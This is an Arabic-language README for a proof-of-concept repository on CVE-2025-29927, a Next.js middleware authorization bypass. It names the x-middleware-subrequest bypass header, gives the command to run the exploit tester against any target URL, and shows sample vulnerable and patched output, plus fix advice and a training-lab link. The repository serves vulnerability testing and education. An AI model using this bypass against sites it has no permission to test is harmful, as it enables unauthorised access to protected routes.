
يحتوي هذا المستودع على دليل إثبات المفهوم (POC) ونصوص استغلال لـ CVE-2025-29927، وهي ثغرة أمنية خطيرة في Next.js تسمح للمهاجمين بتجاوز فحوصات التفويض المنفذة في الوسيط (middleware).
يحتوي هذا المستودع على إثبات مفهوم (POC) لـ CVE-2025-29927، وهي ثغرة أمنية خطيرة في Next.js تسمح للمهاجمين بتجاوز فحوصات التفويض المطبقة في الوسيط.
يُظهر تطبيق Next.js هذا الثغرة الأمنية مع مسار لوحة تحكم محمي.
npm install
npm run build
npm run start
يمكن لبرنامج الاستغلال النصي اختبار أي تطبيق Next.js لهذه الثغرة الأمنية.
npm run exploit <target-url>
npm run exploit http://localhost:3000/dashboard
يقوم برنامج الاستغلال بما يلي:
x-middleware-subrequest=== Next.js CVE-2025-29927 Middleware Bypass Tester ===
Target: http://localhost:3000/dashboard
Testing vulnerability...
Normal request status: 307
Bypass request status: 200
⚠️ VULNERABLE
The route is protected but accessible with the bypass header
يتوفر تطبيق الإصلاح في فرع how-to-fix.
تحديث إصدار Next.js (موصى به)
تنفيذ التحقق الثانوي
=== Next.js CVE-2025-29927 Middleware Bypass Tester ===
Target: http://localhost:3000/dashboard
Testing vulnerability...
Making request without bypass header...
Making request with bypass header...
Normal request status: 307
Bypass request status: 307
✓ NOT VULNERABLE - Protected Route
The route is protected and the bypass attempt was unsuccessful
Normal request redirected to: /
Bypass request redirected to: /
يستخدم Next.js رأسًا داخليًا x-middleware-subrequest لمنع الطلبات المتكررة. تسمح هذه الثغرة للمهاجمين بتجاوز فحوصات أمان الوسيط عن طريق التلاعب بهذا الرأس.
هل تريد الذهاب أبعد من ذلك؟ تم تنفيذ هذه CVE كعلم في OSS OopsSec Store، وهو مختبر ضعيف عن عمد مصمم لتدريب الأمن الهجومي.
👉 جرب التحدي هنا → kOaDT/oss-oopssec-store
تم توفير هذه الأداة للأغراض التعليمية والاختبارية فقط. استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.